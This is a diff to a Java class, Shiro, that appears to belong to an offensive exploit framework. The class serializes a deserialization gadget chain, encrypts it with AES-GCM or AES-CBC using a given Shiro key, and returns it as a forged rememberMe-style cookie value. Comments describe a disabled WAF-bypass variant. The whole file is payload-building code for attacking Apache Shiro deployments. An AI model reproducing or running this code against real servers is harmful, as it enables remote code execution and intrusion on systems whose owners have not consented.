@@ -2,14 +2,13 @@ package com.liev.clouds.utils.shiroutils;
 
 import com.liev.clouds.exp.shiro.AttackService;
 import com.liev.clouds.payload.shiro.encrypt.CbcEncrypt;
+import com.liev.clouds.payload.shiro.encrypt.GcmEncrypt;
 import com.liev.clouds.payload.shiro.encrypt.ShiroGCM;
 import com.liev.clouds.payload.shiro.FramePayload;
+import com.liev.clouds.payload.shiro.util.AesUtil;
 import com.mchange.v2.ser.SerializableUtils;
 
-
-import javax.xml.bind.DatatypeConverter;
-
-
+import java.util.Base64;
 
 public class Shiro implements FramePayload {
     public Shiro() {
@@ -23,58 +22,23 @@ public class Shiro implements FramePayload {
     @Override
     public String sendpayload(Object chainObject, String shiroKeyWord, String key) throws Exception {
         byte[] serpayload = SerializableUtils.toByteArray(chainObject);
-        byte[] bkey = DatatypeConverter.parseBase64Binary(key);
+        byte[] bkey = Base64.getDecoder().decode(key);
         byte[] encryptpayload = null;
-//        byte[] encryptpayload;
+
         if (AttackService.aesGcmCipherType == 1) {
-//            CipherService cipherService = new AesCipherService();
-//            ByteSource byteSource = cipherService.encrypt(serpayload, bkey);
-//            encryptpayload = byteSource.getBytes();
-//            GcmEncrypt gcmEncrypt = new GcmEncrypt();
             ShiroGCM shiroGCM = new ShiroGCM();
-            String byteSource = shiroGCM.encrypt(key,serpayload);
-//            String byteSource = gcmEncrypt.encrypt(key, serpayload);
-//            encryptpayload = byteSource.getBytes();
+            String byteSource = shiroGCM.encrypt(key, serpayload);
             System.out.println(shiroKeyWord + "=" + byteSource);
             return shiroKeyWord + "=" + byteSource;
-
         } else {
-//            encryptpayload = AesUtil.encrypt(serpayload, bkey);
             CbcEncrypt cbcEncrypt = new CbcEncrypt();
             String byteSource = cbcEncrypt.encrypt(key, serpayload);
             System.out.println(shiroKeyWord + "=" + byteSource);
             return shiroKeyWord + "=" + byteSource;
         }
 
-//增加绕waf的方法，暂不开启。by @by3 @liuwa
-        //return shiroKeyWord +  "=" +"...." + DatatypeConverter.printBase64Binary(encryptpayload);
-//		return shiroKeyWord + "=" + DatatypeConverter.printBase64Binary(encryptpayload);
-
+        // 如果需要增加绕过 WAF 的方法，可以解开下面的注释
+        // return shiroKeyWord + "=" + "...." + Base64.getEncoder().encodeToString(encryptpayload);
+        // return shiroKeyWord + "=" + Base64.getEncoder().encodeToString(encryptpayload);
     }
-//    @Override
-//    public String sendpayload(Object chainObject, String shiroKeyWord, String key) throws Exception {
-//        byte[] serpayload = SerializableUtils.toByteArray(chainObject);
-//        byte[] bkey = DatatypeConverter.parseBase64Binary(key);
-//        byte[] encryptpayload = null;
-//    //        byte[] encryptpayload;
-//        if (AttackService.aesGcmCipherType == 1) {
-//    //            CipherService cipherService = new AesCipherService();
-//    //            ByteSource byteSource = cipherService.encrypt(serpayload, bkey);
-//    //            encryptpayload = byteSource.getBytes();
-//            GcmEncrypt gcmEncrypt = new GcmEncrypt();
-//            String byteSource = gcmEncrypt.encrypt(key,serpayload);
-//    //            encryptpayload = byteSource.getBytes();
-//            System.out.println(shiroKeyWord + "=" + byteSource);
-//            return shiroKeyWord + "=" + byteSource;
-//
-//        } else {
-//            encryptpayload = AesUtil.encrypt(serpayload, bkey);
-//        }
-//
-//        return shiroKeyWord + "=" + DatatypeConverter.printBase64Binary(encryptpayload);
-//    }
-
 }
-
-
-
